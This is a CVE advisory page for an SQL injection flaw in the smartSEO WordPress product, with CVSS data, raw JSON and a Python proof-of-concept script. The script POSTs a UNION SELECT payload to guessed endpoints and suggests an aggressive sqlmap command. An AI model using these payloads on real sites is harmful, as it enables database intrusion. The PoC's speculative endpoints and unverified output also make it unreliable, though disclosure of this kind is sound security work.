Security Vulnerability Report
中文
CVE-2025-28953 CVSS 8.5 HIGH

CVE-2025-28953

Published: 2025-11-06 16:15:50
Last Modified: 2026-04-27 19:16:13
Source: [email protected]

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in axiomthemes smart SEO smartSEO allows SQL Injection.This issue affects smart SEO: from n/a through <= 4.0.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:smartseo:-:*:*:*:*:wordpress:*:* - VULNERABLE
smartSEO <= 4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-28953 SQL Injection PoC for smartSEO WordPress Plugin # Target: axiomthemes smartSEO Plugin <= 4.0 TARGET_URL = input("Enter target URL (e.g., http://example.com): ") # SQL Injection payload - extracts database name PAYLOAD = "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -" def test_sqli(): """Test for SQL injection vulnerability in smartSEO plugin""" # Common vulnerable endpoints for smartSEO plugin endpoints = [ "/wp-admin/admin-ajax.php", "/wp-content/plugins/smart-seo/includes/ajax-handler.php", "/?rest_route=/smart-seo/v1/settings" ] print(f"[*] Testing CVE-2025-28953 on {TARGET_URL}") print(f"[*] Target: axiomthemes smartSEO Plugin <= 4.0") print(f"[*] Vulnerability: SQL Injection") for endpoint in endpoints: url = TARGET_URL.rstrip('/') + endpoint print(f"\n[*] Testing endpoint: {endpoint}") # Example POST request with malicious payload data = { 'action': 'smart_seo_save_settings', 'seo_data': PAYLOAD } try: response = requests.post(url, data=data, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Endpoint responded - Further testing needed") print(f"[+] Response length: {len(response.text)} chars") except requests.RequestException as e: print(f"[-] Request failed: {e}") print("\n[!] Manual verification recommended") print("[!] Use sqlmap for comprehensive testing:") print(f"[!] sqlmap -r request.txt --level=5 --risk=3 --dbs") if __name__ == "__main__": test_sqli()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-28953", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:49.830", "lastModified": "2026-04-27T19:16:12.627", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in axiomthemes smart SEO smartSEO allows SQL Injection.This issue affects smart SEO: from n/a through <= 4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:smartseo:-:*:*:*:*:wordpress:*:*", "matchCriteriaId": "2CA98934-C1BD-4D05-B786-E8402D9FA137"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/smartSEO/vulnerability/wordpress-smart-seo-4-0-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.